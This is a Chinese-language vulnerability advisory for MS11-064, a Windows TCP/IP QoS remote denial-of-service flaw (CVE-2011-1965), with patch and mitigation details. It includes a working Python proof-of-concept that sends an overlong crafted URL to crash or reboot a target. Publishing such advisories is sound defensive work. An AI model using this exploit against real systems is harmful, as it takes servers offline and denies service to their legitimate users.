安全研究
安全漏洞
Microsoft Windows TCP/IP QOS远程拒绝服务漏洞(MS11-064)
发布日期:2011-08-09
更新日期:2011-08-09
受影响系统:
Microsoft Vista描述:
Microsoft Server 2008
Microsoft Windows 7
BUGTRAQ ID: 48990
CVE(CAN) ID: CVE-2011-1965
Microsoft Windows是微软发布的非常流行的操作系统。
Microsoft Windows在实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞重启受影响系统,拒绝服务合法用户。
在解析URL时,TCP/IP栈(Tcpip.sys)中存在错误。可通过提交给启用了基于URL的QoS的Web服务器的特制URL请求造成系统停止响应或重启。
<*来源:Microsoft
链接:http://www.microsoft.com/technet/security/bulletin/MS11-064.mspx
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.exploit-db.com/download/17981
# Exploit Title: MS11-064 : Vulnerabilities in TCP/IP Stack Could
Allow Denial of Service
# Date: 10/12/2011
# Author: Byoungyoung Lee, http://www.cc.gatech.edu/~blee303/
# Version: Windows 7 32bit, fully patched until Aug 2011
# Tested on: Windows 7 32bit
# CVE : CVE-2011-1965
# analysis is available -
http://exploitshop.wordpress.com/2011/09/07/ms11-064-vulnerabilities-in-tcpip-stack-could-allow-denial-of-service-2563894/
------------------------------------------------------------------------------------------------------
# Byoungyoung Lee, http://twitter.com/mylifeasageek
import struct
import socket
HOST = "localhost" # yeah, we've tried this as a local kernel exploit -:)
PORT= 80
def tryOnce(i,j):
print hex(i), hex(j)
filename = ["a"*0x100 for x in range(i)]
filename = "/".join(filename)
filename += "/" + "b" * j
print "filename len : ", hex(len(filename))
hostname = "www.darungrim.org"
header = "GET /%s\n" % filename
header += "HOST: %s\n\n\n" % hostname
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(header)
response = s.recv(1024)
s.close()
print response
return
if __name__ == '__main__':
tryOnce(0x3c,0x7)
建议:
临时解决方法:
* 在防火墙处阻止 ICMP
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS11-064)以及相应补丁:
MS11-064:Vulnerabilities in TCP/IP Stack Could Allow Denial of Service (2563894)
链接:http://www.microsoft.com/technet/security/bulletin/MS11-064.mspx
浏览次数:2831
严重程度:0(网友投票)
绿盟科技给您安全的保障